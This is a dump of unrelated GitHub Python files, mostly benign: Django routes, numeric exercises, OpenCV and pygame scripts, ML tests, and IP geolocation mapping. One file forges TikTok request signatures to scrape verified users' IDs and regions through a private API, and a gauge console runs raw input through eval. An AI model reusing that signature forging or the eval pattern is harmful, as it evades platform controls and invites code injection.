+{"seq_id":"72186346661","text":"from django.conf import settings\nfrom django.views import defaults as default_views\nfrom django.urls import path, re_path\nfrom django.conf.urls.static import static\nfrom adminfeautures.views import (\n user_list_view,\n update_solar_module_preise_view,\n update_wallbox_preise_view,\n update_optional_accessories_preise_view,\n update_andere_konfiguration_werte_view,\n avatar_upload_form,\n delete_user,\n test_delete_selected,\n PasswordUpdateView,\n ViewAdminOrders,\n UpdateAdminAngebot,\n DeleteAngebot,\n UserUpdateView,\n TopVerkauferContainerUpdateView,\n DeleteSelectedAngebots,\n)\n\napp_name = \"adminfeautures\"\n\nurlpatterns = [\n path(\"user-list/\", user_list_view, name=\"user_list\"),\n path(\"user//edit/\", UserUpdateView.as_view(), name=\"user-edit\"),\n path(\n \"user//top-verkaufer-container-update/\",\n TopVerkauferContainerUpdateView.as_view(),\n name=\"top-verkaufer-container-update\",\n ),\n path(\"user//orders/\", ViewAdminOrders.as_view(), name=\"user-orders\"),\n path(\"user//user-update/\", UserUpdateView.as_view(), name=\"user-update\"),\n path(\n \"user//change_password/\",\n PasswordUpdateView.as_view(),\n name=\"change_password\",\n ),\n path(\"user//delete/\", delete_user, name=\"delete_user\"),\n path(\n \"user//orders/\",\n ViewAdminOrders.as_view(),\n name=\"view_admin_orders\",\n ),\n path(\n \"user//orders//\",\n UpdateAdminAngebot.as_view(),\n name=\"update_admin_angebot\",\n ),\n path(\n \"user//orders/delete//\",\n DeleteAngebot.as_view(),\n name=\"delete_angebot\",\n ),\n path(\n \"user//orders/test-delete-selected/\",\n test_delete_selected,\n name=\"test_delete_selected\",\n ),\n path(\n \"user//orders/delete-selected/\",\n DeleteSelectedAngebots.as_view(),\n name=\"delete_selected_angebots\",\n ),\n path(\"user//upload-avatar/\", avatar_upload_form, name=\"upload_avatar\"),\n path(\n \"prices/update_solar_module_preise//\",\n update_solar_module_preise_view,\n name=\"update_solar_module_preise\",\n ),\n path(\n \"prices/update_wallbox_preise//\",\n update_wallbox_preise_view,\n name=\"update_wallbox_preise\",\n ),\n path(\n \"prices/update_optional_accessories_preise//\",\n update_optional_accessories_preise_view,\n name=\"update_optional_accessories_preise\",\n ),\n path(\n \"prices/update_andere_konfiguration_werte//\",\n update_andere_konfiguration_werte_view,\n name=\"update_andere_konfiguration_werte\",\n ),\n re_path(\n r\"^400/$\",\n default_views.bad_request,\n kwargs={\"exception\": Exception(\"Bad Request!\")},\n ),\n re_path(\n r\"^403/$\",\n default_views.permission_denied,\n kwargs={\"exception\": Exception(\"Permission Denied\")},\n ),\n re_path(\n r\"^404/$\",\n default_views.page_not_found,\n kwargs={\"exception\": Exception(\"Page not Found\")},\n ),\n re_path(r\"^500/$\", default_views.server_error),\n]\n\nurlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"teamitjuno/jsh-ubuntu-droplet","sub_path":"adminfeautures/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"74666496740","text":"# Replace every array element by multiplication of previous and next\n# Given an array of integers, update every element with multiplication of previous and next elements with following exceptions.\n# a) First element is replaced by multiplication of first and second.\n# b) Last element is replaced by multiplication of last and second last.\n\ndef MultiplicationPreviousNext(ary):\n\n fnl_lst=[]\n\n for i in range(0,len(ary)):\n if i==0:\n fnl_lst.append(ary[i]*ary[i+1])\n elif i==len(ary)-1:\n fnl_lst.append(ary[i-1]*ary[i])\n else:\n fnl_lst.append(ary[i-1]*ary[i+1])\n\n return fnl_lst\n\ndef main():\n \n ary=[2, 3, 4, 5, 6]\n print(MultiplicationPreviousNext(ary))\n\nif __name__=='__main__':\n main()","repo_name":"ksayee/programming_assignments","sub_path":"python/CodingExercises/MultiplicationPreviousNext.py","file_name":"MultiplicationPreviousNext.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"}
+{"seq_id":"41106654727","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 2 12:52:01 2020\nCircle Detection inspiration:\nhttps://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n@author: modal\n\"\"\"\n#%% INIT\nimage_file_name = 'a2_a_cropped.jpg'\n\nfrom well_plate_project.config import data_dir\nraw_data_dir = data_dir / 'raw'\npath = raw_data_dir / 'EXPERIMENTS'\nimage_file = raw_data_dir / image_file_name\nassert image_file.is_file()\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\n# Load in image, convert to gray scale, and Otsu's threshold\nimage = cv2.imread(str(image_file))\nplt.imshow(image)\nplt.show()\n\noutput = image.copy()\nheight, width = image.shape[:2]\nmaxRadius = int(1.05*(width/14)/2) #12+2\nminRadius = int(0.79*(width/14)/2) #12+2\n\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncircles = cv2.HoughCircles(image=gray, \n method=cv2.HOUGH_GRADIENT, \n dp=1.2, \n minDist=2*minRadius, #there is no overlapping, you could say that the distance between two circles is at least the diameter, so minDist could be set to something like 2*minRadius.\n param1=50,\n param2=50,\n minRadius=minRadius,\n maxRadius=maxRadius \n )\n\nif circles is not None:\n # convert the (x, y) coordinates and radius of the circles to integers\n circlesRound = np.round(circles[0, :]).astype(\"int\")\n # loop over the (x, y) coordinates and radius of the circles\n for (x, y, r) in circlesRound:\n cv2.circle(output, (x, y), r, (0, 255, 0), 4)\n\n plt.imshow(output)\nelse:\n print ('No circles found')\n\n\n\n#https://stackoverflow.com/questions/58109962/how-to-optimize-circle-detection-with-python-opencv\n\n\n","repo_name":"MthBr/well-plate-light-driven-predictions","sub_path":"well_plate_project/data_etl/backup_test/circle_detection_test2.py","file_name":"circle_detection_test2.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"20232276158","text":"# 5 лаба\nimport numpy as np\nimport matplotlib.pyplot as canvas\nfrom numpy import log as ln\n\n\ndef f(x):\n return (x ** 2) * ln(x)\n\n\ndef f2(x):\n return 2 * ln(x) + 3\n\n\ndef trapecy(x, h, a, b):\n size = len(x)\n res = (f(a) + f(b)) / 2\n for i in range(1, size):\n res += f(x[i])\n return res * h\n\n\ndef simpson(x, h, a, b):\n size = int(len(x) / 2)\n res = (f(a) + 4 * f(a + h) + f(b))\n for i in range(1, size):\n res += 2 * f(x[2 * i]) + 4 * f(x[2 * i + 1])\n return res * h / 3\n\n\na = 1\nb = 2\nd = np.arange(a, b, 0.001)\ncanvas.figure(1)\ncanvas.title(\"2я производная\")\ncanvas.xlabel(\"Х\")\ncanvas.ylabel(\"Y\")\ncanvas.grid()\ncanvas.plot(d, f2(d))\nx_m = 2.0 # максимум 2й производной. Получен графическим методом\nm = f2(x_m) # максимальное значение 2й производной\n# eps = 0.00001\n# h = numpy.sqrt(eps*12/((b-a)*m)) # h = 0.005230482293837083\n# n = (b-a)/h #n = 192 (на самом деле 191.186958...., но берем 192 т.к. кратно 4) 192/4 = 48\nh = (b - a) / 192\nxh = np.arange(a, b, h)\nx2h = np.arange(a, b, 2 * h)\ntrapecy1 = trapecy(xh, h, a, b)\ntrapecy2 = trapecy(x2h, 2 * h, a, b)\nsimpson1 = simpson(xh, h, a, b)\nsimpson2 = simpson(x2h, 2 * h, a, b)\nexact = 1.070614703715409714001507879444 # точный результат\nprint(\"Метод трапеций:\")\nprint(\"\\tРезультат с шагом h ► \" + str(trapecy1) + \"\\n\\t\\tс шагом 2h ► \" + str(trapecy2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - trapecy1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(trapecy2 - trapecy1) / 3))\nprint(\"Метода Симпсона:\")\nprint(\"\\tРезультат с шагом h ► \" + str(simpson1) + \"\\n\\t\\tс шагом 2h ► \" + str(simpson2))\nprint(\"\\tСравнение с точным ► \" + str(abs(exact - simpson1)))\nprint(\"\\tПогрешность по Рунге ► \" + str(abs(simpson2 - simpson1) / 15))\ncanvas.show()\n","repo_name":"MalyshkinMike/Gubar","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"23132176977","text":"import os\nimport pygame\nimport time\nimport random\n\nlast_point = [320, 0]\nlast_point1 = [320, 0]\n\n\ndef setup(screen, etc):\n pass\n\ndef draw(screen, etc):\n \n global last_point, last_point1, speed\n \n linewidth = int(etc.knob1*10)+1\n #lines = int(etc.knob2*89)+10\n #lines2\n lines = 72#int(65-(etc.knob2*65))+7\n spacehoriz = 180*etc.knob2+18\n spacevert = spacehoriz\n recsize = 10*etc.knob3\n #if recsize <1 : recsize = 0\n \n \n \n \n for m in range(0, lines) :\n \n #space = int(1280/lines)\n x = m*spacehoriz\n y = 0\n auDio = etc.audio_in[m] / 35\n color = etc.color_picker()\n if auDio < 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y + auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0)\n \n for i in range(0, lines) :\n \n #space = int(1280/lines)\n x = i*spacehoriz\n y = 720\n auDio = etc.audio_in[i] / 35\n color = etc.color_picker()\n if auDio > 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y - -auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0) \n \n for j in range(0, lines) :\n \n space = j*spacehoriz\n \n pygame.draw.line(screen, color, (0,space), (1280,space), linewidth)\n \n \n \n \n ","repo_name":"critterandguitari/ETC_Modes","sub_path":"S - Mirror Grid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
+{"seq_id":"16447370923","text":"import pandas as pd\nimport pytest\nimport os\nimport numpy as np\nimport pickle\nfrom model.ml.data import process_data\nfrom model.ml.model import compute_model_metrics, inference\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\nTEST_DATA_PATH = \"data/raw-census.csv\"\nMODEL_PATH = \"model/saved_models/saved_model.pkl\"\nENCODER_PATH = \"model/saved_models/saved_encoder.pkl\"\nLB_PATH = \"model/saved_models/saved_lb.pkl\"\n\n\n@pytest.fixture\ndef data():\n \"\"\"Load some test data.\"\"\"\n\n if os.path.isfile(TEST_DATA_PATH):\n logger.info(f\"Loading data file {TEST_DATA_PATH}\")\n data = pd.read_csv(TEST_DATA_PATH, nrows=200)\n else:\n logger.info(f\"Data file {TEST_DATA_PATH} not found\")\n exit()\n\n return data\n\n\n@pytest.fixture\ndef cat_features():\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n return cat_features\n\n\n@pytest.fixture\ndef model():\n return pickle.load(open(MODEL_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef encoder():\n return pickle.load(open(ENCODER_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef lb():\n return pickle.load(open(LB_PATH, \"rb\"))\n\n\ndef test_process_data(data, cat_features):\n\n X_train, y_train, encoder, lb = process_data(\n data, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n assert (\n X_train.shape[0] == data.shape[0]\n ), \"Wrong number of rows in source data\"\n\n assert (\n X_train.shape[1] > data.shape[1]\n ), \"Wrong number of features in processed data\"\n\n assert (\n y_train.shape[0] == data.shape[0]\n ), \"Wrong shape of y_train rows after processing data\"\n\n\ndef test_compute_model_metrics():\n\n y = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])\n preds = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])\n precision, recall, fbeta = compute_model_metrics(y, preds)\n\n assert precision > 0.9\n assert recall > 0.6\n assert fbeta > 0.6\n\n\ndef test_inference(model, encoder, lb, data, cat_features):\n \"\"\"Test model inference\"\"\"\n\n X_test, y_test, encoder, lb = process_data(\n data,\n categorical_features=cat_features,\n encoder=encoder,\n lb=lb,\n label=\"salary\",\n training=False,\n )\n\n y_pred = inference(model, X_test)\n\n assert y_pred.shape[0] == X_test.shape[0], \"Wrong predictions shape\"\n pred_average = np.average(y_pred)\n assert (\n 1 >= pred_average >= 0\n ), \"Prediction average of {pred_average} is not between 0 and 1\"\n\n\n# if __name__ == \"__main__\":\n\n# test_inference(model(), encoder(), lb(), data(), cat_features())\n# test_compute_model_metrics()\n# test_process_data(data(), cat_features())\n","repo_name":"ainfinum/mlops-project3","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"11278248011","text":"from __future__ import division\nimport pygame, sys\nfrom pygame.locals import *\npygame.init()\n\n\"\"\" ericbic.py\nby Eric J.Parfitt (ejparfitt@gmail.com)\n\nThis program is designed for coding and decoding the roman alphabet\ninto and out of a character set I made up. My characters are all made\nup of either one or two of a set of four different character parts which\ncan be combined in different ways to get a total of 30 new characters.\n\nVersion: 1.0 alpha\n\"\"\"\n\nWIDTH = 500\nHEIGHT = 400\n\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nclass Icon:\n def __init__(self, image, position=(0, 0)):\n self.image = image\n self.rect = image.get_rect()\n self.rect.x = position[0]\n self.rect.y = position[1]\n\nclass Canvas:\n def __init__(self):\n self.isTop = self.isBottom = self.isFlipped = self.isReset = False\n self.text = None\n self.bottomHalf = None\n self.topHalf = None\n \n def getIcon(self, pallet, mouseLoc):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image)\n return newIcon, i\n return None, None\n \n def tryAdd(self, pallet, mouseLoc, position):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image, position)\n windowSurface.blit(newIcon.image, newIcon.rect)\n return i\n\n def moveBottomHalf(self, bottomHalf, topHalf):\n self.bottomHalf.rect.topleft = self.topHalf.rect.bottomright\n self.bottomHalf.rect.move_ip(0, -int(round(CURVE_WIDTH)))\n \n def update(self, isClick, letter):\n mouseLoc = pygame.mouse.get_pos()\n if letter is not None:\n if self.isFlipped:\n for icon in pallet:\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = False\n letter = letter.capitalize()\n row, col = next(((i, row.index(letter)) for i, row in\n enumerate(alphabet) if letter in row), (None, None))\n if row is not None:\n self.isReset = True\n oldTopHalf = self.topHalf\n oldBottomHalf = self.bottomHalf\n self.topHalf = Icon(pallet[row].image, TOP_CO)\n if col != 0:\n self.bottomHalf = Icon(pallet[col - 1].image)\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n else:\n self.bottomHalf = None\n if self.topHalf is not None:\n for icon in [oldTopHalf, oldBottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n if self.bottomHalf is not None:\n self.bottomHalf.image = pygame.transform.flip(\n self.bottomHalf.image, False, True)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK), (300, 300))\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip() \n letter = None\n elif isClick:\n newIcon, index = (self.getIcon(pallet, mouseLoc))\n if newIcon is not None:\n if self.isReset:\n for icon in [self.topHalf, self.bottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n self.isTop = self.isBottom = self.isReset = False\n if not (self.isTop and self.isBottom):\n if not self.isTop:\n self.isTop = True\n self.topHalf = newIcon\n self.topIndex = index\n self.topHalf.rect.topleft = TOP_CO\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n letter = alphabet[self.topIndex][0]\n else:\n self.isBottom = True\n self.bottomHalf = newIcon\n bottomIndex = index\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n letter = alphabet[self.topIndex][bottomIndex + 1]\n self.isReset = True\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK),\n (300, 300))\n for icon in pallet:\n #if icon is not None:\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = not self.isFlipped\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip()\n letter = None\n clock.tick(FPS)\n return letter\n\nwindowSurface.fill(WHITE)\nimageFiles = [\"EribicBump.png\", \"EribicSpike.png\", \"EribicLoop.png\",\n \"EribicLeftWave.png\", \"EribicRightWave.png\"]\npallet = [Icon(pygame.image.load(image)) for image in imageFiles]\nnoneSymbol = \"?\"\nalphabet = [[\"N\", \"U\", \"M\", \"R\", \"F\", noneSymbol],\n [\"I\", \"C\", \"T\", \"J\", \"V\", \"G\"], [\"E\", \"L\", \"H\", \"O\", \"K\", \"B\"],\n [\"A\", \"D\", \"Y\", \"Q\", noneSymbol, \"W\"],\n [\"S\", noneSymbol, \"P\", \"Z\", \"X\", noneSymbol]]\nletter = None\nfont = pygame.font.SysFont(\"comicsansms\", 72)\nICON_HEIGHT = 50\nORIGINAL_ICON_HEIGHT = 75.328\nORIGINAL_CURVE_WIDTH = 2.5\nCURVE_WIDTH = (ICON_HEIGHT / ORIGINAL_ICON_HEIGHT) * ORIGINAL_CURVE_WIDTH\nTOP_CO = (50, 200)\nwidthTotal = 0\nfor icon in pallet:\n width = icon.image.get_width() * ICON_HEIGHT / icon.image.get_height()\n icon.image = pygame.transform.smoothscale(icon.image, \n (int(round(width)), ICON_HEIGHT))\n icon.rect = icon.image.get_rect()\n widthTotal += width\nxLoc = 0\nfor i in range(len(pallet)):\n icon = pallet[i]\n icon.rect.x = xLoc\n windowSurface.blit(icon.image, icon.rect)\n xLoc += icon.image.get_width() + (WIDTH - widthTotal) / (len(pallet) - 1)\nisFlipped = False\npygame.display.flip()\ncanvas = Canvas()\n\nwhile(True):\n isClick = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == 1:\n isClick = True\n elif event.type == KEYDOWN:\n if event.unicode.isalpha():\n letter = event.unicode\n letter = canvas.update(isClick, letter)\n","repo_name":"esopsis/Ericbic","sub_path":"eribic.py","file_name":"eribic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"31665849587","text":"import sqlite3\nimport re\nimport pandas as pd\nimport plotly.express as px\nimport requests\n\ndef main():\n # mapCountryData()\n # Should create mkdir method\n ipList = retrieveAllIpAddress()\n\n if (len(ipList) > 0): \n ipHashMap = mapIpToCoordinates(ipList)\n updateDatabaseWithCoordinates(ipHashMap)\n else:\n print(\"no ip addresses needed to retrieve coordinates\")\n \n mapCountryDataWithDb()\n groupDataByMonths()\n\ndef retrieveAllIpAddress():\n print(\"retrieving ip addresses from table\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n select_all_ips_query = \"SELECT ip_address FROM tool_download_count WHERE coord_updated IS FALSE\"\n ipList_raw = cursor.execute(select_all_ips_query)\n\n ipList = [i[0] for i in ipList_raw]\n\n return ipList\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef requestIpApi(listofIp, ipToMetaMap):\n url = 'http://ip-api.com/batch'\n\n response = requests.post(url, json=listofIp)\n if response: \n responseJson = response.json()\n if responseJson:\n for obj in responseJson:\n ip = obj['query']\n ipToMetaMap[ip] = obj\n else:\n print('status raise', response.raise_for_status())\n else: \n print('status code', response.status_code)\n\n return ipToMetaMap\n\n# 100 IP address MAX\nMAX_API_BATCH_SIZE = 50\n\ndef mapIpToCoordinates(listofIp):\n print(\"batch conversion of Ip address by 100\")\n \n ipToMetaMap = {}\n for batch in chunks(listofIp, MAX_API_BATCH_SIZE):\n batch_done = requestIpApi(batch, ipToMetaMap)\n ipToMetaMap.update(batch_done)\n\n return ipToMetaMap\n\n\ndef updateDatabaseWithCoordinates(ipMap):\n print(\"update table with lat / lon coordinates\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n for key in ipMap:\n ipx = key\n lat = \"\"\n lon = \"\"\n country = \"\"\n regionName = \"\"\n city = \"\"\n zip = \"\"\n\n if ipMap[key]['status'] == \"success\":\n lat = ipMap[ipx]['lat']\n lon = ipMap[ipx]['lon']\n country = ipMap[ipx]['country']\n regionName = ipMap[ipx]['regionName']\n city = ipMap[ipx]['city']\n zip = ipMap[ipx]['zip']\n\n cursor.execute(\n '''UPDATE tool_download_count SET ip_lat=?, ip_long=?, country=?, region=?, city=?, zip=?, coord_updated=? \\\n WHERE ip_address=? AND coord_updated IS FALSE''', (lat, lon, country, regionName, city, zip, 1, ipx))\n\n dbconn.commit()\n\ndef mapCountryDataWithDb():\n # Testing panda scatter geo plot with select db import\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n fig = px.scatter_geo(df, lat='ip_lat',\n lon='ip_long', hover_name=\"city\",\n width=800, height=400)\n\n fig.update_layout(plot_bgcolor=\"rgba(0, 0, 0, 0)\", paper_bgcolor=\"rgba(0, 0, 0, 0)\", margin=dict(l=0, r=0, t=0, b=0))\n\n fig.show()\n\n # Using kaleido - export in PNG\n fig.write_image(\"map/images/output.png\")\n\n # Export in HTML\n fig.write_html(\"map/html/output.html\")\n\ndef groupDataByMonths():\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n df['Year'] = pd.to_datetime(df['date_download']).dt.year\n df['Month'] = pd.to_datetime(df['date_download']).dt.month\n\n g = df.groupby([('Year'), ('Month')]).sum().to_json(r\"map/json/map_months.json\")\n # print(g)\n\ndef mapCountryData():\n # Testing panda scatter geo plot with csv import\n\n df = pd.read_csv(\"csv/countries.csv\")\n\n fig = px.scatter_geo(df, lat='latitude',\n lon='longitude', hover_name=\"name\")\n fig.update_layout(title='World map', title_x=0.5)\n fig.show()\n\n\n# Call main\nif __name__ == \"__main__\":\n main()\n","repo_name":"jessewoo/githubStats","sub_path":"map/mapDb.py","file_name":"mapDb.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"30942129302","text":"#!/usr/bin/python3\n\n\"\"\"\ninitialize Isotemp water bath, then provide user with an interactive console for debugging\n\"\"\"\n\nimport convectron475 as convectron\nimport traceback\n\ngauge = convectron.ConvectronController(port=\"/dev/cu.usbserial-ftE17ZWN\")\n\nwhile True:\n\tcmd = input(\"gauge.\")\n\ttry:\n\t\tret = eval(\"gauge.{}\".format(cmd))\n\t\tprint(ret)\n\texcept:\n\t\ttraceback.print_exc()\n\t\tgauge.disconnect()","repo_name":"octopode/pyvectron","sub_path":"convectrontest.py","file_name":"convectrontest.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70058091300","text":"import time\nimport string\nimport requests\nimport itertools\n\nfrom urllib.parse import urlencode\nfrom utils.signer import *\n\nclass Verifinder:\n def __init__(self, proxy: str or None = None, count: int = 4) -> None:\n self.proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'} if proxy else None\n self.accounts = []\n self.keywords = get_keywords(count)\n\n def __base_params(self, keyword: str, cursor: int = 0) -> str:\n return urlencode({\n \"count\" : 30,\n \"cursor\" : cursor,\n \"keyword\" : keyword,\n \"search_source\" : \"report_user\",\n \"type\" : 1,\n \"request_tag_from\" : \"h5\",\n \"storage_type\" : 0,\n \"iid\" : 7137816409338136325,\n \"channel\" : \"googleplay\",\n \"device_type\" : \"SM-G973N\",\n \"device_id\" : 6990239216324986369,\n \"os_version\" : 9,\n \"version_code\" : 160904,\n \"app_name\" : \"musically_go\",\n \"device_brand\" : \"samsung\",\n \"device_platform\" : \"android\",\n \"aid\" : 1340,\n })\n \n def __base_headers(self, params: str) -> dict:\n sig = XGorgon(\n params = params\n ).get_value()\n \n return {\n \"accept-encoding\" : \"gzip\",\n \"sdk-version\" : \"2\",\n \"x-ss-req-ticket\" : str(int(time.time() * 1000)),\n \"x-khronos\" : sig[\"X-Khronos\"],\n \"x-gorgon\" : sig[\"X-Gorgon\"],\n \"host\" : \"api16-normal-c-useast1a.tiktokv.com\",\n \"connection\" : \"Keep-Alive\",\n \"user-agent\" : \"okhttp/3.10.0.1\"\n }\n \n def __scrape_veris(self, keyword: str, cursor: int = 0) -> requests.Response:\n __base_params = self.__base_params(keyword, cursor)\n \n return requests.get(\n url = (\n \"https://api16-normal-c-useast1a.tiktokv.com\"\n + \"/aweme/v1/discover/search/?\"\n + __base_params \n ),\n headers = self.__base_headers(__base_params)\n )\n \n def main(self):\n cursor = 0\n for keyword in self.keywords:\n while True:\n try:\n __scrape_req = self.__scrape_veris(keyword, cursor)\n # print(__scrape_req.text)\n for _ in __scrape_req.json()[\"user_list\"]:\n if _[\"user_info\"][\"unique_id\"] not in self.accounts:\n \n self.accounts.append(_[\"user_info\"][\"unique_id\"])\n info_string = f'{_[\"user_info\"][\"unique_id\"]}:{_[\"user_info\"][\"follower_count\"]}:{_[\"user_info\"][\"uid\"]}:{_[\"user_info\"][\"sec_uid\"]}:{_[\"user_info\"][\"region\"]}'\n \n print(info_string)\n \n with open(\"utils/veris.txt\") as file:\n file.write(info_string + \"\\n\")\n \n if len(__scrape_req.json()[\"user_list\"]) == 0:\n cursor = 0\n break\n \n cursor += 30 if cursor < 30 else 31\n \n except Exception:\n cursor = 0\n break\n \nif __name__ == \"__main__\":\n Verifinder().main()","repo_name":"xtekky/TikTok-Verified-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"}
+{"seq_id":"23279257994","text":"from functools import cmp_to_key\nfrom itertools import chain\nfrom typing import *\n\nimport edgir\nfrom edg_core import *\nfrom . import footprint as kicad\n\n\nclass InvalidNetlistBlockException(BaseException):\n pass\n\n\nclass InvalidPackingException(BaseException):\n pass\n\n\nclass Netlist(NamedTuple): # TODO use TransformUtil.Path across the board\n blocks: Dict[str, kicad.Block] # block name: footprint name\n nets: Dict[str, List[kicad.Pin]] # net name: list of member pins\n\n\nBlocks = Dict[TransformUtil.Path, kicad.Block] # path -> Block\nEdges = Dict[TransformUtil.Path, List[TransformUtil.Path]] # Pins (block name, port / pin name) -> net-connected Pins\nAssertConnected = List[Tuple[TransformUtil.Path, TransformUtil.Path]]\nNames = Dict[TransformUtil.Path, TransformUtil.Path] # Path -> shortened path name\nClassPaths = Dict[TransformUtil.Path, List[str]] # Path -> class names corresponding to shortened path name\nclass NetlistTransform(TransformUtil.Transform):\n @staticmethod\n def path_to_pin(path: TransformUtil.Path) -> kicad.Pin:\n assert not path.links and not path.params\n return kicad.Pin('.'.join(path.blocks), '.'.join(path.ports))\n\n @staticmethod\n def flatten_port(path: TransformUtil.Path, port: edgir.PortLike) -> Iterable[TransformUtil.Path]:\n if port.HasField('port'):\n return [path]\n elif port.HasField('array') and port.array.HasField('ports'):\n return chain(*[NetlistTransform.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in port.array.ports.ports])\n else:\n raise ValueError(f\"don't know how to flatten netlistable port {port}\")\n\n def __init__(self, design: CompiledDesign, refdes_mode: str = \"pathName\"):\n self.blocks: Blocks = {}\n self.edges: Edges = {}\n self.assert_connected: AssertConnected = []\n self.short_paths: Names = {TransformUtil.Path.empty(): TransformUtil.Path.empty()} # seed root\n self.class_paths: ClassPaths = {TransformUtil.Path.empty(): []} # seed root\n self.pins: Set[TransformUtil.Path] = set()\n self.names: Names = {}\n\n self.design = design\n self.refdes_mode = refdes_mode\n\n def process_blocklike(self, path: TransformUtil.Path, block: Union[edgir.Link, edgir.LinkArray, edgir.HierarchyBlock]) -> None:\n # generate short paths for children first\n short_path = self.short_paths[path]\n class_path = self.class_paths[path]\n\n # TODO handle mixed net/connect operations\n if isinstance(block, edgir.Link) and 'nets' in block.meta.members.node:\n # Consolidate single-net link ports into just the link\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path\n\n else:\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n for link_pair in block.links:\n self.short_paths[path.append_link(link_pair.name)] = 